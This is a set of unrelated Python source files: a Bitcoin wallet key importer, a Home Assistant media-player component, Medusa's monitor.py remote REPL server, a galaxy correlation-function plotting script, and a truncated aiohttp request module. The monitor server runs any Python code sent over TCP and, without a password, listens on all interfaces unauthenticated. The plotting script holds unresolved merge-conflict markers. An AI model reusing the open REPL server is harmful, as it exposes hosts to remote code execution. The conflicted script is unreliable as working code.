raise ValueError("Expected a key of 44 or 372 base-64 digits")
def priv_to_der(priv):
"""Convert a small 32-byte private key into a full 279-byte DER key
(including the public key).
This requires that priv_der has been compiled.
priv must be a binary string of 32 bytes.
"""
p = subprocess.Popen(['./priv_der'], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
stdout, stderr = p.communicate(priv)
return stdout
def import_key(keyLine, db_dir, input_mode="b58", dryrun=False,verbose=False):
if len(keyLine.strip()) == 0:
return
if input_mode == "b58":
priv_bin = privkey_b58_bin(keyLine)
elif input_mode == "b64":
priv_bin = privkey_b64_bin(keyLine)
elif input_mode == "bin":
if len(keyLine) not in (32, 279):
raise ValueError("Expected a key of 32 or 279 bytes")
priv_bin = keyLine
if len(priv_bin) == 32:
# Get the full DER key
priv_bin = priv_to_der(priv_bin)
# The public key of a DER-encoded private key is just the last 65 bytes
pub_bin = priv_bin[-65:]
# Print out the key and address
if verbose:
print "Private key: %s" % util.long_hex(priv_bin)
print "Public key: %s" % util.long_hex(pub_bin)
else:
print "Private key: %s" % util.short_hex(priv_bin)
print "Public key: %s" % util.short_hex(pub_bin)
addr = base58.public_key_to_bc_address(pub_bin)
if addr == '':
# This can happen if pycrypto is not installed, or if the RIPEMD160
# hash is not available (it has been removed in the Debian/Ubuntu
# version)
print "Warning: Cannot calculate address; check pycrypto library"
else:
print "Address: %s" % addr
# Data for wallet.update_wallet
data = {
'private_key': priv_bin,
'public_key': pub_bin,
}
try:
db_env = util.create_env(db_dir)
except bsddb.db.DBNoSuchFileError:
logging.error("Couldn't open " + db_dir)
sys.exit(1)
if not dryrun:
db = wallet.open_wallet(db_env, writable=True)
wallet.update_wallet(db, 'key', data)
db.close()
def main(args=None):
# Usage message without all of the options
usage = """%prog [OPTIONS] KEYFILE
Import a private key into your Bitcoin wallet.
The private key must be a full 279-byte DER key. By default, it must be in
base58 notation (and may have whitespace). This may be changed to base64
or binary input."""
if args is None:
args = sys.argv[1:]
fileName = None
print( args)
if len(args) >= 1:
fileName = args[0]
if fileName.startswith('-'):
fileName = 'key.txt'
# Parse arguments and options
parser = optparse.OptionParser(usage)
parser.add_option("-n", "--dry-run",
action="store_true", dest="dryrun", default=False,
help="don't actually write to the wallet")
parser.add_option("-v", "--verbose",
action="store_true", dest="verbose", default=False,
help="print out the full public/private keys")
parser.add_option("--datadir",
action="store", dest="datadir", default=None,
help="look for files here (defaults to bitcoin default)")
parser.add_option("-b", "--binary",
action="store_true", dest="input_bin", default=False,
help="input file is binary (not base58)")
parser.add_option("--base64",
action="store_true", dest="input_b64", default=False,
help="input file is base64 (not base58)")
(options, args) = parser.parse_args(args)
if options.input_bin and options.input_b64:
parser.error("Can't specify both --binary and --base64.")
elif options.input_bin:
input_mode = "bin"
elif options.input_b64:
input_mode = "b64"
else:
input_mode = "b58"
if fileName == None:
keyfile = sys.stdin
else:
keyfile = open(fileName, 'rb' if options.input_bin else 'r')
if options.datadir is None:
db_dir = util.determine_db_dir()
else:
db_dir = options.datadir
for keyLine in getTextLines(keyfile.read()):
import_key(keyLine, db_dir, input_mode=input_mode, dryrun=options.dryrun, verbose=options.verbose)
keyfile.close()
if __name__ == "__main__":
sys.exit(main())
|
|
"""
homeassistant.components.media_player
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Component to interface with various media players
"""
import logging
from homeassistant.components import discovery
from homeassistant.helpers.device import Device
from homeassistant.helpers.device_component import DeviceComponent
from homeassistant.const import (
ATTR_ENTITY_ID, SERVICE_TURN_OFF, SERVICE_VOLUME_UP,
SERVICE_VOLUME_DOWN, SERVICE_MEDIA_PLAY_PAUSE, SERVICE_MEDIA_PLAY,
SERVICE_MEDIA_PAUSE, SERVICE_MEDIA_NEXT_TRACK, SERVICE_MEDIA_PREV_TRACK)
DOMAIN = 'media_player'
DEPENDENCIES = []
SCAN_INTERVAL = 30
ENTITY_ID_FORMAT = DOMAIN + '.{}'
DISCOVERY_PLATFORMS = {
discovery.services.GOOGLE_CAST: 'cast',
}
SERVICE_YOUTUBE_VIDEO = 'play_youtube_video'
STATE_NO_APP = 'idle'
ATTR_STATE = 'state'
ATTR_OPTIONS = 'options'
ATTR_MEDIA_STATE = 'media_state'
ATTR_MEDIA_CONTENT_ID = 'media_content_id'
ATTR_MEDIA_TITLE = 'media_title'
ATTR_MEDIA_ARTIST = 'media_artist'
ATTR_MEDIA_ALBUM = 'media_album'
ATTR_MEDIA_IMAGE_URL = 'media_image_url'
ATTR_MEDIA_VOLUME = 'media_volume'
ATTR_MEDIA_DURATION = 'media_duration'
MEDIA_STATE_UNKNOWN = 'unknown'
MEDIA_STATE_PLAYING = 'playing'
MEDIA_STATE_STOPPED = 'stopped'
YOUTUBE_COVER_URL_FORMAT = 'http://img.youtube.com/vi/{}/1.jpg'
def is_on(hass, entity_id=None):
""" Returns true if specified media player entity_id is on.
Will check all media player if no entity_id specified. """
entity_ids = [entity_id] if entity_id else hass.states.entity_ids(DOMAIN)
return any(not hass.states.is_state(entity_id, STATE_NO_APP)
for entity_id in entity_ids)
def turn_off(hass, entity_id=None):
""" Will turn off specified media player or all. """
data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.services.call(DOMAIN, SERVICE_TURN_OFF, data)
def volume_up(hass, entity_id=None):
""" Send the media player the command for volume up. """
data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.services.call(DOMAIN, SERVICE_VOLUME_UP, data)
def volume_down(hass, entity_id=None):
""" Send the media player the command for volume down. """
data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.services.call(DOMAIN, SERVICE_VOLUME_DOWN, data)
def media_play_pause(hass, entity_id=None):
""" Send the media player the command for play/pause. """
data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.services.call(DOMAIN, SERVICE_MEDIA_PLAY_PAUSE, data)
def media_play(hass, entity_id=None):
""" Send the media player the command for play/pause. """
data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.services.call(DOMAIN, SERVICE_MEDIA_PLAY, data)
def media_pause(hass, entity_id=None):
""" Send the media player the command for play/pause. """
data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.services.call(DOMAIN, SERVICE_MEDIA_PAUSE, data)
def media_next_track(hass, entity_id=None):
""" Send the media player the command for next track. """
data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.services.call(DOMAIN, SERVICE_MEDIA_NEXT_TRACK, data)
def media_prev_track(hass, entity_id=None):
""" Send the media player the command for prev track. """
data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.services.call(DOMAIN, SERVICE_MEDIA_PREV_TRACK, data)
SERVICE_TO_METHOD = {
SERVICE_TURN_OFF: 'turn_off',
SERVICE_VOLUME_UP: 'volume_up',
SERVICE_VOLUME_DOWN: 'volume_down',
SERVICE_MEDIA_PLAY_PAUSE: 'media_play_pause',
SERVICE_MEDIA_PLAY: 'media_play',
SERVICE_MEDIA_PAUSE: 'media_pause',
SERVICE_MEDIA_NEXT_TRACK: 'media_next_track',
}
def setup(hass, config):
""" Track states and offer events for media_players. """
component = DeviceComponent(
logging.getLogger(__name__), DOMAIN, hass, SCAN_INTERVAL,
DISCOVERY_PLATFORMS)
component.setup(config)
def media_player_service_handler(service):
""" Maps services to methods on MediaPlayerDevice. """
target_players = component.extract_from_service(service)
method = SERVICE_TO_METHOD[service.service]
for player in target_players:
getattr(player, method)()
if player.should_poll:
player.update_ha_state(True)
for service in SERVICE_TO_METHOD:
hass.services.register(DOMAIN, service, media_player_service_handler)
def play_youtube_video_service(service, media_id):
""" Plays specified media_id on the media player. """
target_players = component.extract_from_service(service)
if media_id:
for player in target_players:
player.play_youtube(media_id)
hass.services.register(DOMAIN, "start_fireplace",
lambda service:
play_youtube_video_service(service, "eyU3bRy2x44"))
hass.services.register(DOMAIN, "start_epic_sax",
lambda service:
play_youtube_video_service(service, "kxopViU98Xo"))
hass.services.register(DOMAIN, SERVICE_YOUTUBE_VIDEO,
lambda service:
play_youtube_video_service(
service, service.data.get('video')))
return True
class MediaPlayerDevice(Device):
""" ABC for media player devices. """
def turn_off(self):
""" turn_off media player. """
pass
def volume_up(self):
""" volume_up media player. """
pass
def volume_down(self):
""" volume_down media player. """
pass
def media_play_pause(self):
""" media_play_pause media player. """
pass
def media_play(self):
""" media_play media player. """
pass
def media_pause(self):
""" media_pause media player. """
pass
def media_next_track(self):
""" media_next_track media player. """
pass
def play_youtube(self, media_id):
""" Plays a YouTube media. """
pass
|
|
# -*- Mode: Python -*-
# Author: Sam Rushing <rushing@nightmare.com>
#
# python REPL channel.
#
RCS_ID = '$Id: monitor.py,v 1.5 2002/03/23 15:08:06 amk Exp $'
import md5
import socket
import string
import sys
import time
VERSION = string.split(RCS_ID)[2]
import asyncore_25 as asyncore
import asynchat_25 as asynchat
from counter import counter
import producers
class monitor_channel (asynchat.async_chat):
try_linemode = 1
def __init__ (self, server, sock, addr):
asynchat.async_chat.__init__ (self, sock)
self.server = server
self.addr = addr
self.set_terminator ('\r\n')
self.data = ''
# local bindings specific to this channel
self.local_env = sys.modules['__main__'].__dict__.copy()
self.push ('Python ' + sys.version + '\r\n')
self.push (sys.copyright+'\r\n')
self.push ('Welcome to %s\r\n' % self)
self.push ("[Hint: try 'from __main__ import *']\r\n")
self.prompt()
self.number = server.total_sessions.as_long()
self.line_counter = counter()
self.multi_line = []
def handle_connect (self):
# send IAC DO LINEMODE
self.push ('\377\375\"')
def close (self):
self.server.closed_sessions.increment()
asynchat.async_chat.close(self)
def prompt (self):
self.push ('>>> ')
def collect_incoming_data (self, data):
self.data = self.data + data
if len(self.data) > 1024:
# denial of service.
self.push ('BCNU\r\n')
self.close_when_done()
def found_terminator (self):
line = self.clean_line (self.data)
self.data = ''
self.line_counter.increment()
# check for special case inputs...
if not line and not self.multi_line:
self.prompt()
return
if line in ['\004', 'exit']:
self.push ('BCNU\r\n')
self.close_when_done()
return
oldout = sys.stdout
olderr = sys.stderr
try:
p = output_producer(self, olderr)
sys.stdout = p
sys.stderr = p
try:
# this is, of course, a blocking operation.
# if you wanted to thread this, you would have
# to synchronize, etc... and treat the output
# like a pipe. Not Fun.
#
# try eval first. If that fails, try exec. If that fails,
# hurl.
try:
if self.multi_line:
# oh, this is horrible...
raise SyntaxError
co = compile (line, repr(self), 'eval')
result = eval (co, self.local_env)
method = 'eval'
if result is not None:
print repr(result)
self.local_env['_'] = result
except SyntaxError:
try:
if self.multi_line:
if line and line[0] in [' ','\t']:
self.multi_line.append (line)
self.push ('... ')
return
else:
self.multi_line.append (line)
line = string.join (self.multi_line, '\n')
co = compile (line, repr(self), 'exec')
self.multi_line = []
else:
co = compile (line, repr(self), 'exec')
except SyntaxError, why:
if why[0] == 'unexpected EOF while parsing':
self.push ('... ')
self.multi_line.append (line)
return
else:
t,v,tb = sys.exc_info()
del tb
raise t,v
exec co in self.local_env
method = 'exec'
except:
method = 'exception'
self.multi_line = []
(file, fun, line), t, v, tbinfo = asyncore.compact_traceback()
self.log_info('%s %s %s' %(t, v, tbinfo), 'warning')
finally:
sys.stdout = oldout
sys.stderr = olderr
self.log_info('%s:%s (%s)> %s' % (
self.number,
self.line_counter,
method,
repr(line))
)
self.push_with_producer (p)
self.prompt()
# for now, we ignore any telnet option stuff sent to
# us, and we process the backspace key ourselves.
# gee, it would be fun to write a full-blown line-editing
# environment, etc...
def clean_line (self, line):
chars = []
for ch in line:
oc = ord(ch)
if oc < 127:
if oc in [8,177]:
# backspace
chars = chars[:-1]
else:
chars.append (ch)
return string.join (chars, '')
class monitor_server (asyncore.dispatcher):
SERVER_IDENT = 'Monitor Server (V%s)' % VERSION
channel_class = monitor_channel
def __init__ (self, hostname='127.0.0.1', port=8023):
asyncore.dispatcher.__init__(self)
self.hostname = hostname
self.port = port
self.create_socket (socket.AF_INET, socket.SOCK_STREAM)
self.set_reuse_addr()
self.bind ((hostname, port))
self.log_info('%s started on port %d' % (self.SERVER_IDENT, port))
self.listen (5)
self.closed = 0
self.failed_auths = 0
self.total_sessions = counter()
self.closed_sessions = counter()
def writable (self):
return 0
def handle_accept (self):
conn, addr = self.accept()
self.log_info('Incoming monitor connection from %s:%d' % addr)
self.channel_class (self, conn, addr)
self.total_sessions.increment()
def status (self):
return producers.simple_producer (
'<h2>%s</h2>' % self.SERVER_IDENT
+ '<br><b>Total Sessions:</b> %s' % self.total_sessions
+ '<br><b>Current Sessions:</b> %d' % (
self.total_sessions.as_long()-self.closed_sessions.as_long()
)
)
def hex_digest (s):
m = md5.md5()
m.update (s)
return string.joinfields (
map (lambda x: hex (ord (x))[2:], map (None, m.digest())),
'',
)
class secure_monitor_channel (monitor_channel):
authorized = 0
def __init__ (self, server, sock, addr):
asynchat.async_chat.__init__ (self, sock)
self.server = server
self.addr = addr
self.set_terminator ('\r\n')
self.data = ''
# local bindings specific to this channel
self.local_env = {}
# send timestamp string
self.timestamp = str(time.time())
self.count = 0
self.line_counter = counter()
self.number = int(server.total_sessions.as_long())
self.multi_line = []
self.push (self.timestamp + '\r\n')
def found_terminator (self):
if not self.authorized:
if hex_digest ('%s%s' % (self.timestamp, self.server.password)) != self.data:
self.log_info ('%s: failed authorization' % self, 'warning')
self.server.failed_auths = self.server.failed_auths + 1
self.close()
else:
self.authorized = 1
self.push ('Python ' + sys.version + '\r\n')
self.push (sys.copyright+'\r\n')
self.push ('Welcome to %s\r\n' % self)
self.prompt()
self.data = ''
else:
monitor_channel.found_terminator (self)
class secure_encrypted_monitor_channel (secure_monitor_channel):
"Wrap send() and recv() with a stream cipher"
def __init__ (self, server, conn, addr):
key = server.password
self.outgoing = server.cipher.new (key)
self.incoming = server.cipher.new (key)
secure_monitor_channel.__init__ (self, server, conn, addr)
def send (self, data):
# send the encrypted data instead
ed = self.outgoing.encrypt (data)
return secure_monitor_channel.send (self, ed)
def recv (self, block_size):
data = secure_monitor_channel.recv (self, block_size)
if data:
dd = self.incoming.decrypt (data)
return dd
else:
return data
class secure_monitor_server (monitor_server):
channel_class = secure_monitor_channel
def __init__ (self, password, hostname='', port=8023):
monitor_server.__init__ (self, hostname, port)
self.password = password
def status (self):
p = monitor_server.status (self)
# kludge
p.data = p.data + ('<br><b>Failed Authorizations:</b> %d' % self.failed_auths)
return p
# don't try to print from within any of the methods
# of this object. 8^)
class output_producer:
def __init__ (self, channel, real_stderr):
self.channel = channel
self.data = ''
# use _this_ for debug output
self.stderr = real_stderr
def check_data (self):
if len(self.data) > 1<<16:
# runaway output, close it.
self.channel.close()
def write (self, data):
lines = string.splitfields (data, '\n')
data = string.join (lines, '\r\n')
self.data = self.data + data
self.check_data()
def writeline (self, line):
self.data = self.data + line + '\r\n'
self.check_data()
def writelines (self, lines):
self.data = self.data + string.joinfields (
lines,
'\r\n'
) + '\r\n'
self.check_data()
def flush (self):
pass
def softspace (self, *args):
pass
def more (self):
if self.data:
result = self.data[:512]
self.data = self.data[512:]
return result
else:
return ''
if __name__ == '__main__':
if '-s' in sys.argv:
sys.argv.remove ('-s')
print 'Enter password: ',
password = raw_input()
else:
password = None
if '-e' in sys.argv:
sys.argv.remove ('-e')
encrypt = 1
else:
encrypt = 0
if len(sys.argv) > 1:
port = string.atoi (sys.argv[1])
else:
port = 8023
if password is not None:
s = secure_monitor_server (password, '', port)
if encrypt:
s.channel_class = secure_encrypted_monitor_channel
import sapphire
s.cipher = sapphire
else:
s = monitor_server ('', port)
asyncore.loop(use_poll=1)
|
|
import sys
import numpy as np
import matplotlib.pyplot as plt
################################################################################
# main
################################################################################
def main():
############################################################################
# Open the files and read the data.
#
# You may prefer to manually edit the filename and number of galaxies
# in the datasets.
############################################################################
# Read in off the command line some string to look for in the
# input files.
'''
tag = 'logbinning_GPU_100k'
if len(sys.argv)>=2:
tag = sys.argv[1]
'''
filenames = [None,None,None,None]
filenames[0] = sys.argv[1] # DD
#filenames[1] = filenames[0].replace("data","flat") # RR
#filenames[2] = filenames[0].replace("data_data","data_flat") # DR
filenames[1] = filenames[0].replace("DD","RR") # RR
filenames[2] = filenames[0].replace("DD","DRa") # DR
filenames[3] = filenames[0].replace("DD","DRb") # DR
tag = filenames[0].split("DD_")[1].split('.')[0]
# Pull the number of galaxies out of the file name.
#ngal_in_file = tag.split('_')[-1][0:-1]
#ngal_in_file = tag.split('_')[-1][0:-1]
#ngalaxies = float(ngal_in_file)*1000.0
#nd = 401926.
#nr = 213277.
#nr = 1075634.
#nr = 1075634.
#nr = 4299990.
#nr = 5375624.
#nr = 216323.
#nd = 10000.
#nr = 100000.
#nd = 401927.
#nr = 216323.
#nd = 401927.
#nr = 213277.
nd = 101292.
nr = 57997.
############################################################################
############################################################################
dd = None
rr = None
dr = None
bin_lo = None
bin_hi = None
numbers = []
# Loop over the files and pull out the necessary info.
for i,name in enumerate(filenames):
print "Opening: ",name
#infile = open(name)
nums = np.loadtxt(name)[0:2]
# Parse the entire contents of the file into a big array of floats.
content = np.loadtxt(name,skiprows=2)
nentries = len(content)
content = content.transpose()
# We know there are three columns of numbers, so we can pull out what
# we want using an array of the indices.
if i==0:
bin_lo = content[0]
bin_hi = content[1]
dd = content[2]
nd = nums[0]
elif i==1:
rr = content[2]
nr = nums[0]
elif i==2:
dr = content[2]
print dr[0:10]
elif i==3:
dr += content[2]
print dr[0:10]
#print dd
print "nd/nr: %d %d" % (nd,nr)
############################################################################
# Calculate the normalization.
dd_norm = ((nd*nd)-nd)/2.0
rr_norm = ((nr*nr)-nr)/2.0
dr_norm = (nd*nr)/1.0
print "DD normalization:",dd_norm
print "RR normalization:",rr_norm
print "DR normalization:",dr_norm
# Normalize the data appropriately.
dd /= dd_norm
rr /= rr_norm
dr /= dr_norm
# Calculate the angular correlation function here.
w = (dd-(2.0*dr)+rr)/rr
bin_mid = (bin_hi+bin_lo)/2.0
bin_width = (bin_hi-bin_lo)
# Divide out the bin width.
#w /= bin_width
############################################################################
# Write out the function to a file.
############################################################################
outfile = open('default_acf.dat','w+')
for lo,hi,wval in zip(bin_lo,bin_hi,w):
if wval==wval: # Check for nans and infs
output = "%.3e %.3e %f\n" % (lo,hi,wval)
outfile.write(output)
outfile.close()
############################################################################
################################################################################
# Make a figure on which to plot the angular correlation function.
################################################################################
fig0 = plt.figure(figsize=(9,6),dpi=100,facecolor='w',edgecolor='k')
ax0 = fig0.add_subplot(1,1,1)
fig0.subplots_adjust(top=0.95,bottom=0.15,right=0.95)
################################################################################
############################################################################
# Format the plot.
############################################################################
ax0.set_xlabel(r"$r$ (Mpc)", fontsize=24, weight='bold')
ax0.set_ylabel(r"w($r$)", fontsize=24, weight='bold')
plt.xticks(fontsize=24,weight='bold')
plt.yticks(fontsize=24,weight='bold')
#bin_mid *= 0.7
<<<<<<< HEAD
#ax0.scatter(bin_mid,bin_mid*w,s=30)
#ax0.scatter(bin_mid,np.log10(w),s=30)
ax0.scatter(bin_mid,w,s=30)
=======
#ax0.scatter(bin_mid,bin_mid*bin_mid*w,s=30)
ax0.scatter(bin_mid,w,s=30)
#ax0.scatter(bin_mid,w,s=30)
>>>>>>> 9ca12655bb7f45a83a958b2d083fb0e70c9bed90
#ax0.set_xlabel(r"$w$ (r)",fontsize=24, weight='bold')
#ax0.set_ylabel(r"w($\theta$)",fontsize=24, weight='bold')
plt.xticks(fontsize=24,weight='bold')
plt.yticks(fontsize=24,weight='bold')
#ax0.set_xscale('log')
#ax0.set_yscale('log')
#ax0.set_xlim(10,200)
#ax0.set_xlim(-10,130)
#ax0.set_ylim(0.001,0.4)
#ax0.set_ylim(0.01,100)
#ax0.set_ylim(0.01,5)
################################################################################
# Make a figure on which to plot the DD,RR,DR
################################################################################
'''
fig1 = plt.figure(figsize=(15,4),dpi=100,facecolor='w',edgecolor='k')
fig1.add_subplot(1,3,1)
plt.scatter(bin_mid,dd,s=30)
plt.xlabel(r"$\theta$ (degrees)", fontsize=24, weight='bold')
plt.ylabel(r"DD normalized counts", fontsize=18, weight='bold')
fig1.add_subplot(1,3,2)
plt.scatter(bin_mid,rr,s=30)
plt.xlabel(r"$\theta$ (degrees)", fontsize=24, weight='bold')
plt.ylabel(r"RR normalized counts", fontsize=18, weight='bold')
fig1.add_subplot(1,3,3)
plt.scatter(bin_mid,dr,s=30)
plt.xlabel(r"$\theta$ (degrees)", fontsize=24, weight='bold')
plt.ylabel(r"DR normalized counts", fontsize=18, weight='bold')
'''
plt.tight_layout()
plt.show()
################################################################################
# Top-level script evironment
################################################################################
if __name__ == "__main__":
main()
|
|
__all__ = ('Request', 'StreamResponse', 'Response')
import asyncio
import binascii
import cgi
import collections
import http.cookies
import io
import json
import warnings
from urllib.parse import urlsplit, parse_qsl, unquote
from types import MappingProxyType
from . import hdrs
from .helpers import reify
from .multidict import (CIMultiDictProxy,
CIMultiDict,
MultiDictProxy,
MultiDict)
from aio2py.required.aiohttp.protocol import Response as ResponseImpl, HttpVersion10
from .streams import EOF_MARKER
sentinel = object()
class HeadersMixin:
_content_type = None
_content_dict = None
_stored_content_type = sentinel
def _parse_content_type(self, raw):
self._stored_content_type = raw
if raw is None:
# default value according to RFC 2616
self._content_type = 'application/octet-stream'
self._content_dict = {}
else:
self._content_type, self._content_dict = cgi.parse_header(raw)
@property
def content_type(self, _CONTENT_TYPE=hdrs.CONTENT_TYPE):
"""The value of content part for Content-Type HTTP header."""
raw = self.headers.get(_CONTENT_TYPE)
if self._stored_content_type != raw:
self._parse_content_type(raw)
return self._content_type
@property
def charset(self, _CONTENT_TYPE=hdrs.CONTENT_TYPE):
"""The value of charset part for Content-Type HTTP header."""
raw = self.headers.get(_CONTENT_TYPE)
if self._stored_content_type != raw:
self._parse_content_type(raw)
return self._content_dict.get('charset')
@property
def content_length(self, _CONTENT_LENGTH=hdrs.CONTENT_LENGTH):
"""The value of Content-Length HTTP header."""
l = self.headers.get(_CONTENT_LENGTH)
if l is None:
return None
else:
return int(l)
FileField = collections.namedtuple('Field', 'name filename file content_type')
############################################################
# HTTP Request
############################################################
class Request(dict, HeadersMixin):
POST_METHODS = {hdrs.METH_PATCH, hdrs.METH_POST, hdrs.METH_PUT,
hdrs.METH_TRACE, hdrs.METH_DELETE}
def __init__(self, app, message, payload, transport, reader, writer, *,
_HOST=hdrs.HOST, secure_proxy_ssl_header=None):
self._app = app
self._version = message.version
self._transport = transport
self._reader = reader
self._writer = writer
self._method = message.method
self._host = message.headers.get(_HOST)
self._path_qs = message.path
res = urlsplit(message.path)
self._path = unquote(res.path)
self._query_string = res.query
self._post = None
self._post_files_cache = None
self._headers = CIMultiDictProxy(message.headers)
if self._version < HttpVersion10:
self._keep_alive = False
else:
self._keep_alive = not message.should_close
# matchdict, route_name, handler
# or information about traversal lookup
self._match_info = None # initialized after route resolving
self._payload = payload
self._cookies = None
self._read_bytes = None
self._has_body = not payload.at_eof()
self._secure_proxy_ssl_header = secure_proxy_ssl_header
@property
def scheme(self):
"""A string representing the scheme of the request.
'http' or 'https'.
"""
if self._transport.get_extra_info('sslcontext'):
return 'https'
secure_proxy_ssl_header = self._secure_proxy_ssl_header
if secure_proxy_ssl_header is not None:
header, value = secure_proxy_ssl_header
if self._headers.get(header) == value:
return 'https'
return 'http'
@property
def method(self):
"""Read only property for getting HTTP method.
The value is upper-cased str like 'GET', 'POST', 'PUT' etc.
"""
return self._method
@property
def version(self):
"""Read only property for getting HTTP version of request.
Returns aiohttp.protocol.HttpVersion instance.
"""
return self._version
@property
def host(self):
"""Read only property for getting *HOST* header of request.
Returns str or None if HTTP request has no HOST header.
"""
return self._host
@property
def path_qs(self):
"""The URL including PATH_INFO and the query string.
E.g, /app/blog?id=10
"""
return self._path_qs
@property
def path(self):
"""The URL including *PATH INFO* without the host or scheme.
E.g., ``/app/blog``
"""
return self._path
@property
def query_string(self):
"""The query string in the URL.
E.g., id=10
"""
return self._query_string
@reify
def GET(self):
"""A multidict with all the variables in the query string.
Lazy property.
"""
return MultiDictProxy(MultiDict(parse_qsl(self._query_string)))
@reify
def POST(self):
"""A multidict with all the variables in the POST parameters.
post() methods has to be called before using this attribute.
"""
if self._post is None:
raise RuntimeError("POST is not available before post()")
return self._post
@property
def headers(self):
"""A case-insensitive multidict proxy with all headers."""
return self._headers
@property
def keep_alive(self):
"""Is keepalive enabled by client?"""
return self._keep_alive
@property
def match_info(self):
"""Result of route resolving."""
return self._match_info
@property
def app(self):
"""Application instance."""
return self._app
@property
def transport(self):
"""Transport used for request processing."""
return self._transport
@property
def cookies(self):
"""Return request cookies.
A read-only dictionary-like object.
"""
if self._cookies is None:
raw = self.headers.get(hdrs.COOKIE, '')
parsed = http.cookies.SimpleCookie(raw)
self._cookies = MappingProxyType(
{key: val.value for key, val in parsed.items()})
return self._cookies
@property
def payload(self):
"""Return raw payload stream."""
warnings.warn('use Request.content instead', DeprecationWarning)
return self._payload
@property
def content(self):
"""Return raw payload stream."""
return self._payload
@property
def has_body(self):
"""Return True if request has HTTP BODY, False otherwise."""
return self._has_body
@asyncio.coroutine
def release(self):
"""Release request.
Eat unread part of HTTP BODY if present.
"""
chunk = yield from self._payload.readany()
while chunk is not EOF_MARKER or chunk:
chunk = yield from self._payload.readany()
@asyncio.coroutine
def read(self):
"""Read request body if present.
Returns bytes object with full request content.
"""
if self._read_bytes is None:
body = bytearray()
while True:
chunk = yield from self._payload.readany()
body.extend(chunk)
if chunk is EOF_MARKER:
break
self._read_bytes = bytes(body)
return self._read_bytes
@asyncio.coroutine
def text(self):
"""Return BODY as text using encoding from .charset."""
bytes_body = yield from self.read()
encoding = self.charset or 'utf-8'
return bytes_body.decode(encoding)
@asyncio.coroutine
def json(self, *, loader=json.loads):
"""Return BODY as JSON."""
body = yield from self.text()
return loader(body)
@asyncio.coroutine
def post(self):
"""Return POST parameters."""
if self._post is not None:
return self._post
if self.method not in self.POST_METHODS:
self._post = MultiDictProxy(MultiDict())
return self._post
content_type = self.content_type
if (content_type not in ('',
'application/x-www-form-urlencoded',
'multipart/form-data')):
self._post = MultiDictProxy(MultiDict())
return self._post
body = yield from self.read()
content_charset = self.charset or 'utf-8'
environ = {'REQUEST_METHOD': self.method,
'CONTENT_LENGTH': str(len(body)),
'QUERY_STRING': '',
'CONTENT_TYPE': self.headers.get(hdrs.CONTENT_TYPE)}
fs = cgi.FieldStorage(fp=io.BytesIO(body),
environ=environ,
keep_blank_values=True,
encoding=content_charset)
supported_transfer_encoding = {
'base64': binascii.a2b_base64,
'quoted-printable': binascii.a2b_qp
}
out = MultiDict()
for field in fs.list or ():
transfer_encoding = field.headers.get(
hdrs.CONTENT_TRANSFER_ENCODING, None)
if field.filename:
ff = FileField(field.name,
field.filename,
field.file, # N.B. file closed error
field.type)
if self._post_files_cache is None:
self._post_files_cache = {}
self._post_files_cache[field.name] = field
out.add(field.name, ff)
else:
value = field.value
if transfer_encoding in supported_transfer_encoding:
# binascii accepts bytes
value = value.encode('utf-8')
value = supported_transfer_encoding[
transfer_encoding](value)
out.add(field.name, value)
self._post = MultiDictProxy(out)
return self._post
def __repr__(self):
return "<{} {} {} >".format(self.__class__.__name__,
self.method, self.path)
############################################################
# HTTP Response classes
############################################################
class StreamResponse(HeadersMixin):
def __init__(self, *, status=200, reason=None, headers=None):
self._body = None
self._keep_alive = None
self._chunked = False
self._chunk_size = None
self._compression = False
self._compression_force = False
self._headers = CIMultiDict()
self._cookies = http.cookies.SimpleCookie()
self.set_status(status, reason)
self._req = None
self._resp_impl = None
self._eof_sent = False
if headers is not None:
self._headers.extend(headers)
def _copy_cookies(self):
for cookie in self._cookies.values():
value = cookie.output(header='')[1:]
self.headers.add(hdrs.SET_COOKIE, value)
@property
def started(self):
return self._resp_impl is not None
@property
def status(self):
return self._status
@property
def chunked(self):
return self._chunked
@property
def compression(self):
return self._compression
@property
def reason(self):
return self._reason
def set_status(self, status, reason=None):
self._status = int(status)
if reason is None:
reason = ResponseImpl.calc_reason(status)
self._reason = reason
@property
def keep_alive(self):
return self._keep_alive
def force_close(self):
self._keep_alive = False
def enable_chunked_encoding(self, chunk_size=None):
"""Enables automatic chunked transfer encoding."""
self._chunked = True
self._chunk_size = chunk_size
def enable_compression(self, force=False):
"""Enables response compression with `deflate` encoding."""
self._compression = True
self._compression_force = force
@property
def headers(self):
return self._headers
@property
def cookies(self):
return self._cookies
def set_cookie(self, name, value, *, expires=None,
domain=None, max_age=None, path='/',
secure=None, httponly=None, version=None):
"""Set or update response cookie.
Sets new cookie or updates existent with new value.
Also updates only those params which are not None.
"""
old = self._cookies.get(name)
if old is not None and old.coded_value == '':
# deleted cookie
self._cookies.pop(name, None)
self._cookies[name] = value
c = self._cookies[name]
if expires is not None:
c['expires'] = expires
if domain is not None:
c['domain'] = domain
if max_age is not None:
c['max-age'] = max_age
if path is not None:
c['path'] = path
if secure is not None:
c['secure'] = secure
if httponly is not None:
c['httponly'] = httponly
if version is not None:
c['version'] = version
def del_cookie(self, name, *, domain=None, path='/'):
"""Delete cookie.
Creates new empty expired cookie.
"""
# TODO: do we need domain/path here?
self._cookies.pop(name, None)
self.set_cookie(name, '', max_age=0, domain=domain, path=path)
@property
def content_length(self):
# Just a placeholder for adding setter
return super().content_length
@content_length.setter
def content_length(self, value):
if value is not None:
value = int(value)
# TODO: raise error if chunked enabled
self.headers[hdrs.CONTENT_LENGTH] = str(value)
elif hdrs.CONTENT_LENGTH in self.headers:
del self.headers[hdrs.CONTENT_LENGTH]
@property
def content_type(self):
# Just a placeholder for adding setter
return super().content_type
@content_type.setter
def content_type(self, value):
self.content_type # read header values if needed
self._content_type = str(value)
self._generate_content_type_header()
@property
def charset(self):
# Just a placeholder for adding setter
return super().charset
@charset.setter
def charset(self, value):
ctype = self.content_type # read header values if needed
if ctype == 'application/octet-stream':
raise RuntimeError("Setting charset for application/octet-stream "
